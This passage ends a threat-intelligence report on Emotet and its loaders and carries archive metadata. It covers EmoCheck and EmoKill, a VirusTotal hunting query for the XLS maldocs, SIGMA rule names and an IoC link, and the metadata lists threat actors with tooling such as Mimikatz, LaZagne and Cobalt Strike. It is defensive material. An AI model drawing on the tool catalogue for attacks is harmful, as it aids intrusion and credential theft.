detection. More subtle detection (EDR, behavioral\r\nanalysis) would be required to detect the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, which is dubbed EmoCheck, was released a while ago by the JPCERT\r\n(available here on their Github repository). This checker might be relevant particularly for forensics teams when they\r\ninvestigate workstations or servers that might have been infected by Emotet.  Emocheck-ReportChecker can also be\r\nhelpful as it generates statistics out of numerous Emocheck reports\r\nAnother relevant tool named EmoKill. This program was inspired from the detection rules of Emocheck and was\r\ncompiled and shared on Github.\r\nTo draft this report, Intrinsec studied commonalities of XLS maldocs sent to Emotet’s victims as spearphishing attachments.\r\nOne common metadata that could be leveraged on VirusTotal Intel for hunting purposes goes as follow:\r\nmagic:”CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar, Last\r\nSaved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04 18:19:34\r\n2015, Security: 0″\r\nThe code page identifier 1251 refers to Windows Cyrillic-Slavic encoding, mostly used by Russians, Bulgarians, Serbians\r\nand Macedonians. It is also worth noting that all results of the aforementioned query on VT have the same filesize of 255 kB\r\nSeveral SIGMA detection rules could be leveraged to detect an attack by Emotet malware:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nTo detect all threats mentioned in this report (Emotet, IcedID, BumbleBee), defenders can also rely on relevant Abuse threat\r\nintel sources such as Feodotracker, ThreatFox and MalwareBazaar as well as the soon available Intrinsec’s IoCs feed.\r\nIndicators of compromise\r\nIoCs are available at https://github.com/Intrinsec/IOCs/tree/main/Emotet\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=”1″ _builder_version=”4.19.4″\r\n_module_preset=”default” global_colors_info=”{}”][et_pb_row _builder_version=”4.19.4″ _module_preset=”default”\r\nglobal_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.19.4″ _module_preset=”default”\r\nglobal_colors_info=”{}”][/et_pb_column][/et_pb_row][/et_pb_section]\r\nSource: https://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/" ], "report_names": [ "emotet-returns-and-deploys-loaders" ], "threat_actors": [ { "id": "e8e18067-f64b-4e54-9493-6d450b7d40df", "created_at": "2022-10-25T16:07:24.515213Z", "updated_at": "2026-04-10T02:00:05.018868Z", "deleted_at": null, "main_name": "Mummy Spider", "aliases": [ "ATK 104", "Gold Crestwood", "Mummy Spider", "TA542" ], "source_name": "ETDA:Mummy Spider", "tools": [ "Emotet", "Geodo", "Heodo" ], "source_id": "ETDA", "reports": null }, { "id": "506404b2-82fb-4b7e-b40d-57c2e9b59f40", "created_at": "2023-01-06T13:46:38.870883Z", "updated_at": "2026-04-10T02:00:03.128317Z", "deleted_at": null, "main_name": "MUMMY SPIDER", "aliases": [ "TA542", "GOLD CRESTWOOD" ], "source_name": "MISPGALAXY:MUMMY SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "2ac83159-1d9d-4db4-a176-97be6b7b07c9", "created_at": "2024-06-19T02:03:08.024653Z", "updated_at": "2026-04-10T02:00:03.672512Z", "deleted_at": null, "main_name": "GOLD CRESTWOOD", "aliases": [ "Mummy Spider ", "TA542 " ], "source_name": "Secureworks:GOLD CRESTWOOD", "tools": [ "Emotet" ], "source_id": "Secureworks", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434477, "ts_updated_at": 1775826768, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.pdf", "text": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.txt", "img": "https://archive.orkl.eu/4e8c55fd789a464429527d10f07ce9ba0b291aa9.jpg" } }